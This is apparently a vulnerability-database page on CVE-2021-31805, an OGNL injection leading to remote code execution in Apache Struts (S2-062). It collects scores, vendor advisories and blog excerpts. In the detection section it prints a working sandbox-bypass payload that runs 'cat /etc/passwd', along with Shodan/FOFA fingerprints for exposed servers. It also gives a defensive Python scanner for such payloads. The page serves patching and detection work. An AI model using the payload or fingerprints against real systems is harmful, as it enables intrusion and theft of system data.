CVE-2021-31805
Published 2022-04-12
Priority P1 · 91 · critical · 9.8 · CVSS 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 85.31% (99.7th percentile)
The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | struts | 2.0.0 – 2.5.29 | — |
Detection & IOCs (extracted from sources)
Command:
```
%{
(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +
(#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +
(#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))
}
```
- Exploit is delivered via HTTP POST with a multipart/form-data body; the OGNL payload is injected into a form field (e.g., 'id') using the %{...} forced-evaluation syntax. Monitor for multipart POST requests containing OGNL expressions with BeanMap, memberAccess, excludedPackageNames, excludedClasses, or InstanceManager references.
- The payload abuses 'freemarker.template.utility.Execute' instantiated via 'org.apache.tomcat.InstanceManager' to achieve RCE. Alert on any OGNL expression referencing these class names in HTTP request bodies.
- Shodan/FOFA fingerprints for exposed Struts2 instances: search for HTTP HTML containing 'apache struts', page title 'struts2 showcase', or HTML containing 'struts problem report'.
- The exploit bypasses the OGNL sandbox by zeroing out 'excludedPackageNames' and 'excludedClasses' via a BeanMap reflection chain — a pattern shared with S2-061 (CVE-2020-17530). Detections for S2-061 payloads should be extended to cover this variant.
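A defender-side check for the indicators listed above, written here as an added example (it is not code from any of the sources quoted on this page): it splits a multipart/form-data body into fields and flags a field only when the %{ forced-evaluation marker appears together with one of the sandbox-bypass class or member names, so a harmless %{...} template string on its own is not reported. The boundary, field names and field values are constructed for the example.

```python
import re
from urllib.parse import unquote_plus
# Indicators from the detection notes above: the %{...} forced-evaluation marker
# plus the class/member names the S2-061/S2-062 sandbox-bypass chain references.
FORCED_OGNL = re.compile(r"%\{")
SUSPICIOUS_TOKENS = ("BeanMap", "memberAccess", "excludedPackageNames", "excludedClasses",
                     "InstanceManager", "freemarker.template.utility.Execute")

# Constructed sample request (not a captured exploit): "id" carries the marker plus
# bypass tokens; "comment" carries a harmless %{...} that must not be flagged.
SAMPLE_CONTENT_TYPE = "multipart/form-data; boundary=----ExampleBoundary42"
SAMPLE_BODY = (
    b"------ExampleBoundary42\r\n"
    b'Content-Disposition: form-data; name="comment"\r\n\r\n'
    b"price is %{amount} today\r\n"
    b"------ExampleBoundary42\r\n"
    b'Content-Disposition: form-data; name="id"\r\n\r\n'
    b"%{(#s=#@org.apache.commons.collections.BeanMap@{}) memberAccess "
    b"excludedClasses InstanceManager}\r\n"
    b"------ExampleBoundary42--\r\n"
)

def multipart_fields(body: bytes, content_type: str) -> dict:
    """Split a multipart/form-data body into {field name: value}."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        return {}
    fields = {}
    for part in body.decode("utf-8", "replace").split("--" + m.group(1)):
        part = part.strip()
        if not part or part == "--":  # leading empty chunk / closing delimiter
            continue
        headers, _, value = part.partition("\r\n\r\n")
        name = re.search(r'name="([^"]*)"', headers)
        if name:
            fields[name.group(1)] = value
    return fields

def scan_request(content_type: str, body: bytes) -> list:
    """One finding per field carrying %{ together with at least one bypass token."""
    findings = []
    for name, raw in multipart_fields(body, content_type).items():
        # Check the raw value and a URL-decoded copy, since payloads are often encoded.
        value = raw + "\n" + unquote_plus(raw)
        if not FORCED_OGNL.search(value):
            continue
        hits = [t for t in SUSPICIOUS_TOKENS if t in value]
        if hits:
            findings.append({"field": name, "tokens": hits})
    return findings
```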
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| ghsa | n/a | 9.8 | CRITICAL | n/a |
| osv | n/a | 9.8 | CRITICAL | n/a |
| vulncheck | n/a | 9.8 | CRITICAL | n/a |
| vendor_oracle | n/a | 9.8 | CRITICAL | n/a |
| vendor_redhat | n/a | 9.8 | CRITICAL | n/a |
Oracle
Oracle Hyperion Risk Matrix: Installation and Configuration (Apache Struts) — CVE-2021-31805
vendor_oracle · 2023-01-15 · CVSS 9.8 · CRITICAL
CVE: CVE-2021-31805
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpujan2023 (JAN 2023)
Oracle
Oracle Communications Risk Matrix: Configuration Management Platform (Apache Struts) — CVE-2021-31805
vendor_oracle · 2022-10-15 · CVSS 9.8 · CRITICAL
CVE: CVE-2021-31805
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpuoct2022 (OCT 2022)
Oracle
Oracle Hospitality Applications Risk Matrix: Login (Apache Struts) — CVE-2021-31805
vendor_oracle · 2022-07-15 · CVSS 9.8 · CRITICAL
CVE: CVE-2021-31805
CVSS: 9.8
Protocol: HTTP
Remote exploit: Yes
Affected versions: Network
Advisory: cpujul2022 (JUL 2022)
Red Hat
Struts: Forced OGNL evaluation, when evaluated on raw not validated user input in tag attributes, may lead to RCE.
vendor_redhat · 2022-04-12 · CVSS 9.8 · CRITICAL · CWE-917
The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.
Statement: Apache Struts2 is not compiled, shipped, used, or enabled in Red Hat products. As such, any CVE against Apache Struts2 does not impact currently supported Red Hat products.
This statement was last revised on 1 Sept 2020.
Previous statement example: https://bugzilla.redhat.com/show_bug.cgi?id=1469265
Package: struts (Red Ha
OSV
Expression Language Injection in Apache Struts
osv · 2022-04-13 · CVSS 9.8 · CRITICAL
The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.
GHSA
Expression Language Injection in Apache Struts
ghsa · 2022-04-13 · CVSS 9.8 · CRITICAL · CWE-917
The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.
VulnCheck
Apache Struts Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
vulncheck · 2021 · CVSS 9.8 · CRITICAL
The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag’s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.
Affected: Apache Struts
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://blog.netlab.360.com/public-cloud-threat-intelligence-202204/; https://media.kasperskycontenthub.com/wp-
No detection rules found.
Nuclei
Apache Struts2 S2-062 - Remote Code Execution
nuclei · CVSS 9.8 · CRITICAL
Apache Struts2 S2-062 is vulnerable to remote code execution. The fix issued for CVE-2020-17530 (S2-061) was incomplete, meaning some of the tag's attributes could still perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax.
Template:
```yaml
id: CVE-2021-31805
info:
  name: Apache Struts2 S2-062 - Remote Code Execution
  author: taielab
  severity: critical
  description: Apache Struts2 S2-062 is vulnerable to remote code execution. The fix issued for CVE-2020-17530 (S2-061) was incomplete, meaning some of the tag's attributes could still perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax.
  impact: |
    Remote code execution
  remediation: Avoid using forced OGNL ev
```
Qualys
Identify Server-Side Attacks Using Qualys Periscope
blogs_qualys · 2022-12-01 · CVSS 8.8 · HIGH
Qualys previously announced the introduction of Qualys Periscope in 2020. This technology allows Qualys Web Application Scanning (WAS) to detect out-of-band vulnerabilities such as server-side request forgery (SSRF). Qualys Periscope provides confirmed detections for additional vulnerabilities, such as Log4j, where it enables rapid development and release of the QID. Occasionally, Qualys receives questions and support cases related to Qualys Periscope. This article will provide more detail on the common questions/situations seen with out-of-band detections.
As of publishing, the vulnerability detections that utilize Qualys Periscope are:
- QID 150055 – OS Command Injection
- QID 150179 – Blind XXE injection
Fortinet
Mirai, RAR1Ransom, and GuardMiner – Multiple Malware Campaigns Target VMware Vulnerability
blogs_fortinet · 2022-10-21 · CVSS 9.8 · CRITICAL · CVE-2022-22954
FORTIGUARD LABS THREAT RESEARCH
By Cara Lin | October 21, 2022
In April, VMware patched a vulnerability CVE-2022-22954. It causes server-side template injection because of the lack of sanitization on parameters “deviceUdid” and “devicetype”. It allows attackers to inject a payload and achieve remote code execution on VMware Workspace ONE Access and Identity Manager. FortiGuard Labs published Threat Signal Report about it and also developed IPS signature in April.
We observed attacks in the wild since then. Most of the payloads focus on probing a victim’s sensitive data, for example, passwords, hosts file, etc. But in August, there were a few particular payloads, which got our interest. They had th
Unit42
Top CVEs to Patch: Insights from the 2022 Unit 42 Network Threat Trends Research Report
blogs_unit42 · 2022-07-21 · CVSS 9.8 · CRITICAL · CVE-2017-5638
Unit 42
Published: July 21, 2022
Apache Log4j
CVE-2017-5638
CVE-2017-9841
CVE-2018-19986
CVE-2019-02320
CVE-2019-19597
CVE-2019-9082
CVE-2020-14882
CVE-2020-14883
CVE-2020-15505
CVE-2020-15506
CVE-2020-25078
CVE-2020-5902
CVE-2021-21315
CVE-2021-22986
CVE-2021-26855
CVE-2021-31805
CVE-2021-34473
CVE-2021-35464
CVE-2021-38647
CVE-2021-40438
CVE-2021-40539
CVE-2021-41773
CVE-2021-42013
CVE-2021-44228
CVE-2021-45046
CVE-2022-22963
CVE-2022-22965
## Executive Summary
Tens of thousands of vulnerabilities are reported every year, but not all are used by threat actors in real-world attacks. There are many reasons for this: a proof of concept (PoC) may not be available for attackers to weaponize, it may be too difficult to exploit the vulnerability, there may be a lack of accessible vulnerable software on the internet, or attackers may simply deem a vulnerability not worth exploiting due to low impact. Real-world defenders need real-world data on which vulnerabilities attackers are choosing to exploit – and where to focus protections.
In the 2022 Unit 42 Network Threat Trends Research Report, we’ve used data captured by the Palo Alto Networks Advanced Threat Prevention security service on Next-Generation Firewall and Prisma SASE from
Greynoiseio
NoiseLetter
blogs_greynoiseio
Greynoiseio
GreyNoise Round-Up: Product Updates
blogs_greynoiseio
References:
- http://www.openwall.com/lists/oss-security/2022/04/12/6
- https://cwiki.apache.org/confluence/display/WW/S2-062
- https://security.netapp.com/advisory/ntap-20220420-0001/
- https://www.oracle.com/security-alerts/cpujul2022.html